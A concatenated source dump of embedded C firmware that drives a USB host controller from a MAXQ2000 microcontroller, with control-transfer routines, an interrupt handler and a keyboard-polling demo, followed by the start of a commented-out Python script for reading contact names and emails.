wreg(rSUDFIFO, sud[i]); // load the 8 setup bytes into the SUDFIFO
wreg(rPERADDR,0x00); // send to address 0
return CTL_WRITE(); // return its error code
}
// Host, Address/Configured
// PURPOSE: Issue a standard GET_STATUS request to the device (two status
// bytes are requested).
// RETURNS: the CTL_READ() host result code (0 = success).
BYTE Get_Device_Status(void)
{
BYTE sud[8];
BYTE i;
sud[0] = 0x80; // 10000000 IN, STD REQ, to Device
sud[1] = 0x00; // 0 is Get_Status
sud[2] = 0x00; // wValueL
sud[3] = 0x00; // wValueH
sud[4] = 0x00; // wIndexL
sud[5] = 0x00; // wIndexH
sud[6] = 0x02; // ask for two bytes
sud[7] = 0x00; // wLengthH
for (i = 0; i < 8; i++)
wreg(rSUDFIFO, sud[i]); // load the 8 setup bytes into the SUDFIFO
return CTL_READ();
}
// Host
// PURPOSE:
// HUB: get hub/port status. If port=0, returns hub status.
// PeriphBytes[0] = StatusL
// PeriphBytes = StatusH
// PeriphBytes = PortChangeL. NOTE: PortChangeH is all zeros so we skip it.
// ARGUMENTS: port - hub port number (0 = the hub itself).
// RETURNS: Result code for the CTL-RD transfer (0=no errors)
BYTE H_GetStat(BYTE port)
{
BYTE sud[8];
BYTE i;
sud[0] = 0xA3; // 10100011 IN, class, "other"
sud[1] = 0x00; // GET_STATUS
sud[2] = 0x00; // wValueL
sud[3] = 0x00; // wValueH
sud[4] = port; // wIndexL = port (0 selects the hub)
sud[5] = 0x00; // wIndexH
sud[6] = 0x04; // wLengthL = 4 status bytes
sud[7] = 0x00; // wLengthH
for (i = 0; i < 8; i++)
wreg(rSUDFIFO, sud[i]); // load the 8 setup bytes into the SUDFIFO
return CTL_READ();
}
// Host
// PURPOSE: Issue a class-specific Set_Feature or Clear_Feature request to a
// hub port.
// ARGUMENTS: setnotclr - nonzero selects Set_Feature, zero Clear_Feature;
// feat - feature selector; port - hub port number.
// RETURNS: the CTL_WRITE() host result code (0 = success).
BYTE HubPort_Feature(BYTE setnotclr,BYTE feat,BYTE port)
{
BYTE sud[8];
BYTE i;
BYTE breq;
if (setnotclr)
breq = 0x03; // Set_Feature
else
breq = 0x01; // Clear_Feature
sud[0] = 0x23; // OUT, class, "other" (port) recipient
sud[1] = breq;
sud[2] = feat; // wValueL = feature selector
sud[3] = 0x00; // wValueH
sud[4] = port; // wIndexL
sud[5] = 0x00; // wIndexH
sud[6] = 0x00; // wLengthL
sud[7] = 0x00; // wLengthH
for (i = 0; i < 8; i++)
wreg(rSUDFIFO, sud[i]); // load the 8 setup bytes into the SUDFIFO
return CTL_WRITE();
}
// Host
// PURPOSE: Issue a HID class SET_IDLE request to an interface.
// ARGUMENTS: iface - interface number (wIndexH); duration - idle rate
// (wValueH); reportID - report selector (wValueL).
// RETURNS: the CTL_WRITE() host result code (0 = success).
// Set_Idle[8] = {0x21,0x0A,0x00,0x00,0x00,0x00,0x00,0x00};
BYTE Set_Idle(BYTE iface, BYTE duration, BYTE reportID)
{
BYTE sud[8];
BYTE i;
sud[0] = 0x21; // bmRequestType=Output, class request, directed to interface
sud[1] = 0x0A; // SET_IDLE
sud[2] = reportID; // wValueL
sud[3] = duration; // wValueH
sud[4] = 0x00; // wIndexL
sud[5] = iface; // wIndexH
sud[6] = 0x0; // wLengthL
sud[7] = 0x0; // wLengthH
for (i = 0; i < 8; i++)
wreg(rSUDFIFO, sud[i]); // load the 8 setup bytes into the SUDFIFO
return CTL_WRITE();
}
// Host, Address/Configured
// PURPOSE: Issue a standard SET_CONFIGURATION request.
// ARGUMENTS: cfgval - configuration value to select.
// RETURNS: the CTL_WRITE() host result code (0 = success).
BYTE Set_Config(BYTE cfgval)
{
BYTE sud[8];
BYTE i;
sud[0] = 0x00; // bmRequestType=Output, std request, directed to device
sud[1] = 0x09; // SET_CONFIG
sud[2] = cfgval; // wValueL
sud[3] = 0x00; // wValueH
sud[4] = 0x00; // wIndexL
sud[5] = 0x00; // wIndexH
sud[6] = 0x0; // wLengthL
sud[7] = 0x0; // wLengthH
for (i = 0; i < 8; i++)
wreg(rSUDFIFO, sud[i]); // load the 8 setup bytes into the SUDFIFO
return CTL_WRITE();
}
// Host, Configured
// PURPOSE: Issue a standard SET_INTERFACE request to select an alternate
// setting on an interface.
// ARGUMENTS: interface - interface number; altsetting - alternate setting.
// RETURNS: the CTL_WRITE() host result code (0 = success).
BYTE Set_Interface(BYTE interface, BYTE altsetting)
{
BYTE sud[8];
BYTE i;
sud[0] = 0x00; // bmRequestType=Output, std request, directed to device
sud[1] = 0x0B; // SET_INTERFACE
sud[2] = altsetting; // wValueL=alternate setting
sud[3] = 0x00; // wValueH=0
sud[4] = interface; // wIndexL=Interface number
sud[5] = 0x00; // wIndexH
sud[6] = 0x0; // wLengthL
sud[7] = 0x0; // wLengthH
for (i = 0; i < 8; i++)
wreg(rSUDFIFO, sud[i]); // load the 8 setup bytes into the SUDFIFO
return CTL_WRITE();
}
// Host, Default/Address/Configured
// Get_Descriptor_Device[8] = {0x80,0x06,0x00,0x01,0x00,0x00,0x40,0x00};
// PURPOSE: Issue a standard GET_DESCRIPTOR request.
// ARGUMENTS: type - descriptor type (wValueH); length - bytes requested (wLength).
// RETURNS: the CTL_READ() host result code (0 = success).
// FIX: USB setup packets are little-endian, so the LOW byte of wLength must be
// sent first. The original sent MSB(length) into the wLengthL slot (and LSB
// into wLengthH), requesting a byte-swapped count.
BYTE Get_Descriptor(BYTE type,WORD length)
{
wreg(rSUDFIFO,0x80); // bmRequestType=Input, Std request, directed to device
wreg(rSUDFIFO,0x06); // GET_DESCRIPTOR
wreg(rSUDFIFO,0x00); // wValueL = descriptor index
wreg(rSUDFIFO,type); // wValueH = descriptor type
wreg(rSUDFIFO,0x00); // wIndexL
wreg(rSUDFIFO,0x00); // wIndexH
wreg(rSUDFIFO,LSB(length)); // wLengthL (low byte first)
wreg(rSUDFIFO,MSB(length)); // wLengthH
return CTL_READ();
}
//Host
// PURPOSE: // **** CONTROL-Write transfer with no OUT data stage. **** //
// 1. This function sends a SETUP token to fnaddr, EP=0, then a DATA0 PID with the 8 setup bytes in SUDFIFO.
// If the transfer error code is nonzero, the function exits with the return value of 1x, where x
// is the RT53 error code.
// 2. If no error, sends an IN handshake to fnaddr, EP=0. By setting the IN and HS bits, the SIE
// automatically checks for the correct peripheral response--an empty DATA1 packet--and ACKS it.
// If the transfer error code is nonzero, the function exits with the return value of 2x, where x
// is the RT53 error code.
// PRECONDITIONS: SUDFIFO pre-loaded with the 8 setup bytes, and PERADDR with the address.
// POSTCONDITIONS:
// ARGUMENTS:
// RETURNS: HSRLT, 0 = Success
// NOTE(review): with the early returns commented out, BOTH phases retry
// forever on any nonzero result code, so this function can hang if the
// device never responds -- confirm this retry-until-success policy is intended.
BYTE CTL_WRITE(void) // call with SUDFIDO loaded with 8 bytes and PERADDR=device address
{
static BYTE errorcode;
// Phase 1. Send the SETUP token and 8 setup bytes. Device should immediately ACK.
do
{
wreg(rHXFR,tokSETUP);
errorcode = Wait_for_HIRQ(bmHXFRDNIRQ);
}
while(errorcode);
// if (errorcode)
// return 0x10 + errorcode; // it's nonzero. The 0x10 indicates first xfr phase
// Phase 2. Send IN handshakes until we get the DATA1 PID (expect NAKS)
do
{
wreg(rHXFR,bmHS); // [*** was A0, now 80h]
errorcode = Wait_for_HIRQ(bmHXFRDNIRQ);
}
while (errorcode/* == hrNAK*/); // Try again if a NAK
// if (errorcode)
// return 0x20 + errorcode; // 0x20 indicates second xfr phase
return(0); // success
}
//Host
// PURPOSE: // **** CONTROL-Read transfer **** //
// The function sends the SETUP packet, then an IN packet, then reads the IN data
// into the RCVFIFO.
// PRECONDITIONS: Before calling, load SUDFIFO with the command request.
// POSTCONDITIONS: On exit, the RCVBC reg indicates the byte count, and the IN data is in the RCVFIFO.
// ARGUMENTS: None.
// RETURNS: Returns 0x00 on success, or 0xXN where X is 0x80, 0x90, etc. & n is the 4-bit HRSL error code.
// NOTE(review): step 3 (copying the RCVFIFO into a local array) is commented
// out, so the caller must drain the RCVFIFO itself -- confirm intended.
BYTE CTL_READ(void)
{
static BYTE dum, errorcode;
//BYTE dum,errorcode,xlen;
// 0. Load the SUDFIFO
//writebytes(rSUDFIFO,8,pSUD);
// 1. Send a SETUP token to addr 0, ep0, followed by a DATA0 PID and the 8 setup bytes in SUDFIFO
// Note that we don't need to initialize the DATA toggle value, the SIE always sends DATA0 for SETUPS.
//
wreg(rHIEN,bmHXFRDNIE); // enable the host transfer done interrupt
wreg(rHXFR,bmSETUP); // trigger the transfer--SIE takes care of both SETUP and DATA stages. EP=0.
errorcode = check_HRSL(); // check_HRSL() waits for HXFRDN IRQ and returns host result code
if (errorcode)
return (0x80+errorcode);
// 2. Send an IN token to addr0, ep0.
dum = rreg(rHIRQ); // 0x68 FRAME, CONN, SNDBAV
SETBIT(rHCTL,bmRCVTOG1); // expect a DATA1 packet
wreg(rHXFR,0x00); // IN token to fnaddr, EP0
errorcode = check_HRSL(); // check_HRSL() waits for any interrupt and returns host result code
if (errorcode)
return (0x90+errorcode);
// 3. Get the byte count, read EP0FIFO into PeriphBytes array
//dum = rreg(rHIRQ); // 0x6C +++ FRAME CONN SNDBAV RCVDAV
//xlen = rreg(rRCVBC); // get the byte count ??? ERROR xlen=0, not 8
//readbytes(rRCVFIFO,xlen ,PeriphBytes);
//SETBIT(rHIRQ,bmRCVDAVIRQ); // clear the IRQ (and rRCVBC register)
// 4. Status stage: empty OUT packet as a handshake.
wreg(rHXFR,(bmOUTNIN | bmHS)); // OUT packet as a handshake
errorcode = check_HRSL(); // check_HRSL() waits for any interrupt and returns host result code
if (errorcode)
return (0xA0+errorcode);
//
return (0); // no errors
}
// Host
// PURPOSE: To remain in a loop until the FRAMEIRQ decrements a global variable to zero.
// PRECONDITIONS: Host mode, SPI configured.
// POSTCONDITIONS: Interrupts are returned to original state.
// ARGUMENTS: int number of USB frames delay desired
// RETURNS: None.
// NOTE(review): FLAG is never cleared here (the clear is commented out); the
// inner wait also exits on a CONNIRQ, so a connect-state change cuts the
// delay short -- confirm both behaviors are intended.
void waitframes(int num)
{
static BYTE temp;
// Store currently enabled IRQs
temp = rreg(rHIEN);
FRAMECOUNT = 0;
while(FRAMECOUNT < num)
{
wreg(rHIEN, (bmFRAMEIE | bmCONNIRQ)); // listen for FRAME or CONNECT
while( !(FLAG & bmFRAMEIRQ) && !(FLAG & bmCONNIRQ) ); // spin until ISR flags one
FRAMECOUNT++;
// FLAG = 0;
}
FRAMECOUNT = 0;
wreg(rHIEN,temp); // restore the caller's interrupt enables
}
// Host
// PURPOSE: PAuse for an expected Host IRQ to occur. This pause can be interrupted by a change in
// device connect status.
// PRECONDITIONS: Host mode, SPI configured.
// POSTCONDITIONS: Interrupts are returned to original state.
// ARGUMENTS: BYTE representing the HIRQ bit mask for the expected Host interrupt
// RETURNS: BYTE HSRLT (low nibble of rHRSL, the host result code)
// NOTE(review): FLAG is never cleared here (the clear is commented out) --
// confirm the ISR / callers rely on that.
BYTE Wait_for_HIRQ(BYTE regbit)
{
static BYTE result, temp1, temp2;
temp1 = regbit;
temp2 = rreg(rHIEN); // save the caller's interrupt enables
wreg(rHIEN,temp1 | (BYTE)bmCONNIRQ); // enable only one IRQ in the HIEN register
while( !(FLAG & temp1) && !(FLAG & bmCONNIRQ) ); // hang until an irq
result = (rreg(rHRSL) & 0x0F); // get the completion code
// FLAG = 0;
wreg(rHIEN,temp2); // restore ints
return result;
}
// Host
// PURPOSE: This ISR services the Host interrupts triggered in the HIRQ register.
// It latches exactly one pending+enabled host interrupt per invocation into
// the global FLAG and clears it in rHIRQ; foreground code spins on FLAG.
// PRECONDITIONS: Host mode, SPI configured, interrupts enabled.
// POSTCONDITIONS: FLAG holds the serviced IRQ's bit mask (or -1 if none was
// valid); NEXT holds the sampled bus state after a CONNIRQ.
// ARGUMENTS: None (hardware vector).
// RETURNS: None.
#pragma vector = 1 // MAXQ2000 Module 1 Vector
__interrupt void interrupt_service_routine()
{
// Has MAXQ2000 INT12 line been triggered?
if ( EIF1_bit.IE12 ) // IE12 EIF1.4
{
// Does a valid enabled host interrupt exist?
// (intentional assignment: latch HIRQ & HIEN, then test nonzero)
if( INTERRUPT = (rreg( rHIRQ ) & rreg( rHIEN )) )
{
// Which host interrupt?
// CONNECT IRQ: USB State of Connection Changed
if ( INTERRUPT & bmCONNIRQ )
{
FLAG = bmCONNIRQ;
wreg(rHCTL,0x04); // Sample the USB bus
// Set the NEXT connection state from the sampled J/K status bits.
switch ( rreg(rHRSL) & 0xC0 )
{
case 0x00 : // SE0 - EOP or disconnect
NEXT = 0x00;
break;
case bmKSTATUS : // K STATE
NEXT = bmKSTATUS;
break;
case bmJSTATUS : // J STATE
NEXT = bmJSTATUS;
break;
default : // error
NEXT = 3;
break;
}
wreg( rHIRQ, bmCONNIRQ ); // clear this irq
}
// HXFRDN IRQ: Host Transfer Done
else if ( INTERRUPT & bmHXFRDNIRQ )
{
FLAG = bmHXFRDNIRQ;
wreg( rHIRQ, bmHXFRDNIRQ ); // clear this irq
}
// BUSEVENT IRQ: [Bus Reset + 50mSec] <or> [Bus Resume + 20mSec]
else if ( INTERRUPT & bmBUSEVENTIRQ )
{
FLAG = bmBUSEVENTIRQ;
wreg( rHIRQ, bmBUSEVENTIRQ); // clear this irq
}
// RSMREQDET IRQ: Bus Resume Request Detected
else if ( INTERRUPT & bmRSMREQDETIRQ )
{
FLAG = bmRSMREQDETIRQ;
wreg( rHIRQ, bmRSMREQDETIRQ ); // clear this irq
}
// RCVDAV IRQ: Receiver FIFO Contains Data
else if ( INTERRUPT & bmRCVDAVIRQ )
{
FLAG = bmRCVDAVIRQ;
wreg( rHIRQ, bmRCVDAVIRQ ); // clear this irq
}
// SNDBAV IRQ: Send Buffer Available
else if ( INTERRUPT & bmSNDBAVIRQ )
{
FLAG = bmSNDBAVIRQ;
wreg( rHIRQ, bmSNDBAVIRQ ); // clear this irq
}
// SUSPENDDN IRQ: Suspend Generation Done
else if ( INTERRUPT & bmSUSPENDDNIRQ )
{
FLAG = bmSUSPENDDNIRQ;
wreg( rHIRQ, bmSUSPENDDNIRQ ); // clear this irq
}
// FRAME IRQ: SOF Packet Begin
else if ( INTERRUPT & bmFRAMEIRQ )
{
FLAG = bmFRAMEIRQ;
wreg( rHIRQ, bmFRAMEIRQ ); // clear the IRQ
}
} // end if(INTERRUPT)
else
{
// No Valid Enabled Interrupt
FLAG = -1;
// Clear MAXQ2000 INT12 Interrupt
EIF1_bit.IE12 = 0;
return;
}
// Clear MAXQ2000 INT12 Interrupt
EIF1_bit.IE12 = 0;
} // end if( EIF1_bit.IE12 )
} // end ISR
//#endif // HOST
#endif
<file_sep>/My Code/simple_test2/simple_test2.c
//
// File........: simple_test.c
// Authors.....:
// Description.:
//
//
// Conditions:
// IFACE: SPI
//
// Date........:
//
// The proper interface can be found in interface.c
#ifndef simple_test_C
#define simple_test_C
// Interrupt or not? - define only one.
//#define INT_DRIVEN
//#define POLLED
// Host or peripheral? - define only one.
#define HST
//#define PER
// Which interface? - define only one.
#define IFACE_SPI
//#define IFACE_I2C
//#include <stdio.h>
//#include <stdlib.h>
#include <intrinsics.h> // MAXQ2000 specific stuff
#include <iomaxq200x.h> // MAXQ2000 specific stuff
#include "RT53reg.h" // RT99 Registers and bits
#include "..\interface.c" // SPI/I2C Implementation
//#include "..\usb.c" // USB Implementation
///// Declare GLOBALS Here ///////////////////////
int FLAG; // last host IRQ serviced by the ISR (-1 = none valid)
BYTE INTERRUPT; // latched (rHIRQ & rHIEN) snapshot taken in the ISR
int FRAMECOUNT; // frame counter used by waitframes()
BYTE errorcode; // last host result code
int NEXT; // bus connection state sampled after a CONNIRQ
BYTE SUD[8]; // my copy of setup data
// prototypes in this module
void waitframes(int num);
BYTE Wait_for_HIRQ(BYTE regbit);
void Read_Keypad(void);
void prep_keypad(void);
//********************
///////////////////////////////////////////////////
// Bring-up test: initialize the MAXQ2000 SPI master and the RT53 in low-speed
// host mode, enable interrupts, wait for one FRAME IRQ, then idle forever.
// NOTE(review): 'result' is declared but never used; 'dum' receives the
// Wait_for_HIRQ() result and is not examined -- debug leftovers, confirm.
main()
{
///// Declare Variables Here ///////////////////////
// static BYTE Set_Addr4[8] = {0x00,0x05,0x04,0x00,0x00,0x00,0x00,0x00};
// static BYTE Set_Config1[8] = {0x00,0x09,0x01,0x00,0x00,0x00,0x00,0x00};
// static BYTE Set_Idle[8] = {0x21,0x0A,0x00,0x00,0x00,0x00,0x00,0x00};
// static BYTE HR1,HR2,HR3;
static BYTE dum, result;
///////////////////////////////////////////////////
// MAXQ2000 SPI port as a master
SPI_Init();
// MUST GO BEFORE AMY SPI TRAFFIC
// RT53: INTLEVEL=0, POSINT=1 for pos edge interrupt pin
wreg(rPINCTL,(bmFDUPSPI|bmPOSINT));
// disable interrupt pin
// wreg(rCPUCTL, 0x00);
// disable all interrupt
wreg(rUSBIEN,0x00);
wreg(rGPINIEN,0x00);
wreg( rHIEN, 0x00 );
wreg(rCPUCTL, 0x00);
// chip reset
// Reset_MAX(1000); // RT53: Reset USB bus [SPI port must be set up before this will work]
wreg(rUSBCTL,0x20);
timeDELAY(500); // a delay
wreg(rUSBCTL,0x00); // remove the reset
timeDELAY(2000); // a delay
// Set up the host
wreg(rMODE,(bmDPPULLDN|bmDMPULLDN|bmSOFKAENAB|bmLOWSPEED|bmHOST)); // low speed
//wreg(rMODE,(bmDPPULLDN|bmDMPULLDN|bmSOFKAENAB|bmHOST)); // full speed
// LED RELATED MAXQ2000
PD0=0xFF; // MAXQ: Set port 0 to outputs
PO0 = rreg(rRevision); // MAXQ: show chip revision on the LED bar
PD7 = 0x01; // MAXQ: P70 is scope TRIG signal
// INTERRUPT RELATED MAXQ2000
// MAX3410E INT pin is tied to MAXQ2000 P60: make it an input
PD6 &= ~0x01; // MAXQ: PD6.0=0 (turn off output)
EIES1_bit.IT12 = 0; // MAXQ: 0=pos edge triggered IRQ
EIE1_bit.EX12 = 1; // MAXQ: Enable Int12
IMR |= 0x02; // MAXQ: enable interrupts for module 1
// Enable interrupt pin
wreg(rCPUCTL, 0x0F);
wreg(rHIRQ, 0xFF); // Clear Pending INTs
// MAXQ: enable interrupts
__enable_interrupt();
///// Your Code Here //////////////////////////////
dum = Wait_for_HIRQ(bmFRAMEIRQ);
while(1);
/////////////////////////////////////////////////////
} // End of main(void)
// Purpose: Busy-wait for 'num' USB FRAME interrupts (one per USB frame).
// FIX: the loop condition was "FRAMECOUNT <= num", which waited num+1 frames;
// "<" matches the documented count and the waitframes() version in usb.c.
void waitframes(int num)
{
FRAMECOUNT = 0;
while(FRAMECOUNT < num)
{
wreg(rHIEN,bmFRAMEIE); // enable only the FRAME interrupt
while( FLAG != bmFRAMEIRQ ); // spin until the ISR flags a FRAME irq
FRAMECOUNT++;
FLAG = 0;
}
FRAMECOUNT = 0;
}
// Busy-wait until the ISR flags the single host interrupt given by 'regbit',
// then return the host result code. All other host IRQs are masked during
// the wait and all are disabled afterwards.
// ARGUMENTS: regbit - HIRQ bit mask of the expected interrupt.
// RETURNS: low nibble of rHRSL (host result code).
BYTE Wait_for_HIRQ(BYTE regbit)
{
static BYTE result;
wreg(rHIEN,regbit); // enable only one IRQ in the HIEN register
while( FLAG != regbit ); // hang until an irq
result = (rreg(rHRSL) & 0x0F); // get the completion code
FLAG = 0;
wreg(rHIEN,0x00); // all ints off
return result;
}
// ISR for MAXQ2000 INT12 (RT53 INT pin). Latches one pending+enabled host
// interrupt into FLAG, records bus state in NEXT on a connect change, and
// clears the serviced bit in rHIRQ. Foreground code spins on FLAG.
#pragma vector = 1 // Module 1 Vector
__interrupt void interrupt_service_routine()
{
// static BYTE fred;
// while(1) // Stay in loop while a valid interrupt exists
// {
// Has INT12 been triggered?
if ( EIF1_bit.IE12 ) // IE12 EIF1.4
{
// Loop while a valid interrupts exists
// (intentional assignment: latch HIRQ & HIEN, then test nonzero)
if( INTERRUPT = (rreg( rHIRQ ) & rreg( rHIEN )) )
// if( (INTERRUPT = (rreg( rHIRQ ) )) != 0x00 )
{
// Check which host interrupt
if ( INTERRUPT & bmCONNIRQ ) // State of Connection Changed
{
FLAG = bmCONNIRQ;
switch ( rreg(rHRSL) & 0xC0 ) // sampled J/K status bits
{
case 0x00 : // SE0 - EOP or disconnect
NEXT = 0;
break;
case bmKSTATUS : // K STATE
NEXT = 1;
break;
case bmJSTATUS : // J STATE
NEXT = 2;
break;
default : // error
NEXT = 3;
break;
}
wreg( rHIRQ, bmCONNIRQ ); // clear this irq
}
else if ( INTERRUPT & bmHXFRDNIRQ ) // Host Transfer Done
{
FLAG = bmHXFRDNIRQ;
wreg( rHIRQ, bmHXFRDNIRQ ); // clear this irq
}
else if ( INTERRUPT & bmBUSEVENTIRQ ) // [bus reset + 50mSec] or [bus resume + 20mSec]
{
FLAG = bmBUSEVENTIRQ;
wreg( rHIRQ, bmBUSEVENTIRQ); // clear this irq
}
else if ( INTERRUPT & bmRSMREQDETIRQ ) // Bus Resume Request Detected
{
FLAG = bmRSMREQDETIRQ;
wreg( rHIRQ, bmRSMREQDETIRQ ); // clear this irq
}
else if ( INTERRUPT & bmRCVDAVIRQ ) // Receiver FIFO contains Data
{
FLAG = bmRCVDAVIRQ;
wreg( rHIRQ, bmRCVDAVIRQ ); // clear this irq
}
else if ( INTERRUPT & bmSUSPENDDNIRQ ) // Suspend generation Done
{
FLAG = bmSUSPENDDNIRQ;
wreg( rHIRQ, bmSUSPENDDNIRQ ); // clear this irq
}
else if ( INTERRUPT & bmSNDBAVIRQ ) // Send Buffer Available
{
FLAG = bmSNDBAVIRQ;
wreg( rHIRQ, bmSNDBAVIRQ ); // clear this irq
}
else if ( INTERRUPT & bmFRAMEIRQ ) // begin SOF Packet
{
FLAG = bmFRAMEIRQ;
wreg( rHIRQ, bmFRAMEIRQ ); // clear the IRQ
}
} // end if(INTERRUPT)
else
{
FLAG = -1; // no valid enabled interrupt
EIF1_bit.IE12 = 0; // clear MAXQ2000 INT12
return;
}
} // end if( EIF1_bit.IE12 )
// } //end while(1)
} // end ISR
#endif
<file_sep>/My Code/interface.h
// interface.h
// SPI specific to the MAXQ board prototypes
// Declares the low-level register access layer for the RT53/RT99 over the
// MAXQ2000 SPI port (single-register reads/writes plus multi-byte FIFO
// transfers). Implemented in interface.c.
#ifndef INTERFACE_H
#define INTERFACE_H
void update_lites(void);
// SPI Specific Prototypes
void SPI_Init(void); // configure the MAXQ2000 SPI port as master
__monitor WORD sendBYTE( WORD ); // send one SPI frame, return received bits
__monitor WORD rreg( WORD ); // read one register
__monitor void wreg( WORD, BYTE ); // write one register
//void wreg(BYTE r,BYTE v);
//BYTE rreg(BYTE r);
BYTE rreg_bb(BYTE reg); // bit-banged variants
void wreg_bb(BYTE r,BYTE v);
__monitor void readbytes(BYTE reg, BYTE N, BYTE *p); // burst read N bytes
__monitor void ReadBytes(BYTE reg, BYTE N, BYTE *p);
__monitor void writebytes(BYTE reg, BYTE N, BYTE *p); // burst write N bytes
__monitor void WriteBytes(BYTE reg, BYTE N, const BYTE *p);
void wregAS(BYTE r,BYTE v);
BYTE rregAS(BYTE r);
BYTE rreg16(BYTE reg);
void wreg16(BYTE reg,BYTE dat);
#endif
<file_sep>/My Code/hst_LS_KBD_NOHUB/hst_LS_KBD_NOHUB.c
//
// File........: hst_LS_KBD_NOHUB.c
// Authors.....:
// Description.:
//
//
// Conditions:
// IFACE: SPI
//
// Date........:
//
// The proper interface can be found in interface.c
#ifndef PER_LS_KBD_NOHUB_C
#define PER_LS_KBD_NOHUB_C
// Interrupt or not? - define only one.
//#define INT_DRIVEN
//#define POLLED
// Host or peripheral? - define only one.
#define HST
//#define PER
// Which interface? - define only one.
#define IFACE_SPI
//#define IFACE_I2C
//#include <stdio.h>
//#include <stdlib.h>
#include <intrinsics.h> // MAXQ2000 specific stuff
#include <iomaxq200x.h> // MAXQ2000 specific stuff
#include "RT53reg.h" // RT99 Registers and bits
#include "..\interface.c" // SPI/I2C Implementation
#include "..\usb.c" // USB Implementation
// prototypes in this module
void Read_Keypad(void); // poll the keyboard's interrupt endpoint
void prep_keypad(void); // (not defined in this file)
//********************
///// Declare GLOBALS Here ///////////////////////
BYTE SUD[8]; // my copy of setup data
///////////////////////////////////////////////////
// Host demo: reset the bus, enumerate a low-speed keyboard to address 4,
// configure it, then poll the keypad and display the bus state on LEDs.
main()
{
///// Declare Variables Here ///////////////////////
BYTE Set_Addr4[8] = {0x00,0x05,0x04,0x00,0x00,0x00,0x00,0x00}; // SET_ADDRESS = 4
BYTE Set_Config1[8] = {0x00,0x09,0x01,0x00,0x00,0x00,0x00,0x00}; // SET_CONFIGURATION = 1
BYTE Set_Idle[8] = {0x21,0x0A,0x00,0x00,0x00,0x00,0x00,0x00}; // HID SET_IDLE
BYTE HR1,HR2,HR3; // host result codes of the three control writes
BYTE dum;
///////////////////////////////////////////////////
SPI_Init(); // set up MAXQ2000 to use its SPI port as a master
wreg(rPINCTL,(bmFDUPSPI|bmPOSINT));//|bmINTLEVEL)); // RT53: INTLEVEL=0, POSINT=1 for pos edge interrupt pin
// chip reset
// Reset_MAX(1000); // RT53: Reset USB bus [SPI port must be set up before this will work]
wreg(rUSBCTL,0x20);
timeDELAY(500); // a delay
wreg(rUSBCTL,0x00); // remove the reset
timeDELAY(2000); // a delay
// Set up the host
wreg(rMODE,(bmDPPULLDN|bmDMPULLDN|bmSOFKAENAB|bmLOWSPEED|bmHOST)); // low speed
//wreg(rMODE,(bmDPPULLDN|bmDMPULLDN|bmSOFKAENAB|bmHOST)); // full speed
// LED RELATED MAXQ2000
PD0=0xFF; // MAXQ: Set port 0 to outputs
PO0 = rreg(rRevision); // MAXQ: show chip revision on the LED bar
PD7 = 0x01; // MAXQ: P70 is scope TRIG signal
// INTERRUPT RELATED MAXQ2000
// // MAX3410E INT pin is tied to MAXQ2000 P60: make it an input
PD6 &= ~0x01; // MAXQ: PD6.0=0 (turn off output)
EIES1_bit.IT12 = 0; // MAXQ: 0=pos edge triggered IRQ
EIE1_bit.EX12 = 1; // MAXQ: Enable Int12
IMR |= 0x02; // MAXQ: enable interrupts for module 1
// wreg(rUSBIEN,0x00);
// wreg(rGPINIEN,0x00);
wreg( rHIEN, 0x00 ); // disable all interrupt
wreg(rCPUCTL, bmIE); // Enable interrupt pin (for scope observation)
__enable_interrupt();
///// Your Code Here //////////////////////////////
// Reset the USB device
wreg(rHIEN, bmBUSEVENTIE); // enable the reset done irq
wreg(rHCTL,bmBUSRST); // initiate the 50 msec bus reset
Wait_for_HIRQ(bmBUSEVENTIRQ); // wait for and clear this interrupt
//
waitframes(4);
// Set_Address to 4
wreg(rPERADDR,0x00); // send to address 0
writebytes(rSUDFIFO,8,Set_Addr4); // Load the SUDFIFO with Set_Address=4 request
HR1 = CTL_WRITE(); // this function returns only after completion
// Set_Config to 1
wreg(rPERADDR,0x04); // address is now 4
writebytes(rSUDFIFO,8,Set_Config1); // Load the SUDFIFO with Set_Config=1 request
HR2 = CTL_WRITE();
// Send the "set_idle" request
writebytes(rSUDFIFO,8,Set_Idle); // Load the SUDFIFO with Set_Idle request
HR3 = CTL_WRITE();
//
Read_Keypad();
dum = rreg(rHRSL); // sample the J/K bus-state bits
dum >>= 6;
dum &=0x03;
wreg(rIOPINS2,dum); // show bus state
//
while(1);
}
//
// functions local to this module
//
// FUNCTION: Read_Keypad
// Send IN tokens to EP1, once every 10 frames.
// If NAK handshake, do nothing. If ACK, read the 8 keyboard data bytes in RCVFIFO, and
// write the keycode to the MAXQ2000 LED bar.
//
void Read_Keypad(void) // constantly read the keypad, return if the connect
{ // state changes
BYTE HR,rxnum,KB_data[8],newkey;
wreg(rHIRQ,bmCONNIRQ); // clear any remnants
wreg(rHCTL,bmRCVTOG0); // very first data toggle should be DATA0
while(1)
{
waitframes(10);
if(rreg(rHIRQ) & bmCONNIRQ) // check for connect-status change
{
wreg(rHIRQ,bmCONNIRQ); // clear the IRQ
return;
}
wreg(rHXFR,0x01); // send an IN token to EP1 (OUTNIN=0)
HR = Wait_for_HIRQ(bmHXFRDNIRQ); // this also clears the IRQ bit
switch(HR)
{
case hrNAK: L8_ON
break; // do nothing
case hrSUCCESS: // get the KB packet
rxnum = rreg(rRCVBC);
TRIG_HI // scope pulse brackets the 8-byte read
readbytes(rRCVFIFO,rxnum,KB_data); // read "rxnum" bytes from the RCVFIFO
// wreg(rHIRQ,bmRCVDAVIRQ); // re-arm the endpont and SWITCH THE BUFFERS
TRIG_LO
newkey = KB_data[2]; // keycode is in the third byte
if(newkey == 0) // turn off the LEDS when keys are up
PO0=0; // (comment out this test to latch keys in LEDS)
else if (newkey >= 0x59 && newkey <= 0x62) // 89 is 1-key, 98 is 0-key
PO0 = newkey - 0x58; // show it in the LEDS (0 shows as 0x0A)
break;
default: // any other completion code is an error
PO0=0xFF; // all bar LEDS on
while(1); // hang here and examine error code
} // switch(HR)
} // while(1)
////////////////////////////////////////////////////
} // End of main(void)
#endif
| 6f64b29e25ba87ab945368476b2eb12724390a74 | [
"C",
"INI"
] | 10 | C | JopperTom/MaxUSB | 25265c3537b05bafcf053443b164726db71b3b12 | 8afeba28fbc60de0f1ce2b3049f9a7117d7d05b1 |
refs/heads/master | <repo_name>avibanerjee/EmailAutomation<file_sep>/script/send_emails.py
# MY_ADDRESS =
# PASSWORD =
# def get_contacts(names, emails):
# # import name, email
# with open(names, 'r') as artist_names:
# with open (emails, 'r') as contact_emails:
# names = []
# emails = []
# for name in artist_names:
# #uppercase name
# uppercase_name = ''
# caps = name.split()
# for i, term in enumerate(caps):
# if i == len(caps) - 1:
# uppercase_name += term[0].upper() + term[1:]
# else:
